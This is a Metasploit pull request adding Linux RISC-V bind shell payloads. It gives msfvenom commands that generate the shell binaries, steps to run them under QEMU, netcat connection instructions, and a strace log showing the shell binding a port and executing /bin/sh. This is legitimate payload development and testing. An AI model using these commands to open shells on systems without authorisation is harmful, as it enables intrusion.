
@bcoles

@bcoles bcoles commented Nov 27, 2025

Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads.

Source

Verification

Tested with QEMU. For other test environments, see #19518 (comment).

Generate a Linux Command Shell, Bind TCP Inline payload (with optional NOP sled):

./msfvenom -n 100 -f elf -p linux/riscv64le/shell_bind_tcp LPORT=1337 > bind.elf
./msfvenom -n 100 -f elf -p linux/riscv32le/shell_bind_tcp LPORT=1337 > bind.elf

Execute the payload with QEMU:

$ /home/user/qemu/build/qemu-riscv64 -strace ./bind.elf
$ /home/user/qemu/build/qemu-riscv32 -strace ./bind.elf

Note the payload was executed successfully (lsof -i :1337) :)

Connect to the bind shell with netcat (`nc HOST 1337`), or use `exploit/multi/handler` with a matching `linux/riscv64le/shell_bind_tcp` / `linux/riscv32le/shell_bind_tcp` payload and `LPORT=1337`.

@dledda-r7 dledda-r7 self-assigned this Nov 27, 2025
@bcoles bcoles force-pushed the linux-riscv-tcp-bind-shell branch from 9cf50f4 to 7ba6d9e Compare December 1, 2025 12:19
@bcoles bcoles force-pushed the linux-riscv-tcp-bind-shell branch from 7ba6d9e to 5871d90 Compare December 11, 2025 01:55
@jbx81-1337

ubuntu@ubuntu:~$ strace ./bind_shell.riscv64.elf
execve("./bind_shell.riscv64.elf", ["./bind_shell.riscv64.elf"], 0x7ffff7dd8a60 /* 22 vars */) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 1)                            = 0
accept(3, NULL, NULL)                   = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
--- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
accept(3, NULL, NULL)                   = 4
dup3(4, 2, 0)                           = 2
dup3(4, 1, 0)                           = 1
dup3(4, 0, 0)                           = 0
execve("/bin/sh", NULL, NULL)           = 0
brk(NULL)                               = 0x555705458000
faccessat(AT_FDCWD, "/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 5
fstat(5, {st_mode=S_IFREG|0644, st_size=21523, ...}) = 0
mmap(NULL, 21523, PROT_READ, MAP_PRIVATE, 5, 0) = 0x7ff898cc2000
close(5)                                = 0
openat(AT_FDCWD, "/lib/riscv64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 5
read(5, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0\363\0\1\0\0\0Ry\2\0\0\0\0\0"..., 832) = 832
fstat(5, {st_mode=S_IFREG|0755, st_size=1534120, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff898cc0000
mmap(NULL, 1572280, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 5, 0) = 0x7ff898b40000
mmap(0x7ff898caf000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 5, 0x16f000) = 0x7ff898caf000
mmap(0x7ff898cb4000, 48568, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff898cb4000
close(5)                                = 0
set_tid_address(0x7ff898cc0d90)         = 1440
set_robust_list(0x7ff898cc0da0, 24)     = 0
mprotect(0x7ff898caf000, 12288, PROT_READ) = 0
mprotect(0x55570022a000, 8192, PROT_READ) = 0
mprotect(0x7ff898cee000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7ff898cc2000, 21523)           = 0
getuid()                                = 1000
getgid()                                = 1000
getpid()                                = 1440
rt_sigaction(SIGCHLD, {sa_handler=0x55570021f526, sa_mask=~[RTMIN RT_1], sa_flags=0}, NULL, 8) = 0
geteuid()                               = 1000
getppid()                               = 1437
getrandom("\x0b\x33\xfb\x5f\xf2\x5a\x83\x01", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x555705458000
brk(0x555705479000)                     = 0x555705479000
getcwd("/home/ubuntu", 4096)            = 13
ioctl(0, TCGETS, 0x7fffd13d1b70)        = -1 ENOTTY (Inappropriate ioctl for device)
geteuid()                               = 1000
getegid()                               = 1000
rt_sigaction(SIGINT, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=~[RTMIN RT_1], sa_flags=0}, NULL, 8) = 0
rt_sigaction(SIGQUIT, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=~[RTMIN RT_1], sa_flags=0}, NULL, 8) = 0
rt_sigaction(SIGTERM, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTERM, {sa_handler=SIG_DFL, sa_mask=~[RTMIN RT_1], sa_flags=0}, NULL, 8) = 0
read(0, "ls\n", 8192)                   = 3
newfstatat(AT_FDCWD, "/usr/local/sbin/ls", 0x7fffd13d1958, 0) = -1 ENOENT (No such file or directory)
newfstatat(AT_FDCWD, "/usr/local/bin/ls", 0x7fffd13d1958, 0) = -1 ENOENT (No such file or directory)
newfstatat(AT_FDCWD, "/usr/sbin/ls", 0x7fffd13d1958, 0) = -1 ENOENT (No such file or directory)
newfstatat(AT_FDCWD, "/usr/bin/ls", {st_mode=S_IFREG|0755, st_size=142256, ...}, 0) = 0
rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1], NULL, 8) = 0
clone(child_stack=0x7fffd13d1a00, flags=CLONE_VM|CLONE_VFORK|SIGCHLD) = 1503
rt_sigprocmask(SIG_SETMASK, [], ~[KILL STOP RTMIN RT_1], 8) = 0
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 1503
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=1503, si_uid=1000, si_status=0, si_utime=2 /* 0.02 s */, si_stime=1 /* 0.01 s */} ---
rt_sigreturn({mask=[]})                 = 1503
wait4(-1, 0x7fffd13d18bc, WNOHANG, NULL) = -1 ECHILD (No child processes)
read(0, "exit\n", 8192)                 = 5
exit_group(0)                           = ?
+++ exited with 0 +++
ubuntu@ubuntu:~$

@dledda-r7 dledda-r7 merged commit 385c4f9 into rapid7:master Jan 5, 2026
56 of 74 checks passed
@bcoles bcoles deleted the linux-riscv-tcp-bind-shell branch January 5, 2026 11:46
@dledda-r7 dledda-r7 added the rn-payload-enhancement release notes for enhanced payloads label Jan 9, 2026
@dledda-r7

Release Notes

This adds a new payload, a bind shell for Linux RISC-V targets.


Labels

payload riscv RISC-V rn-payload-enhancement release notes for enhanced payloads
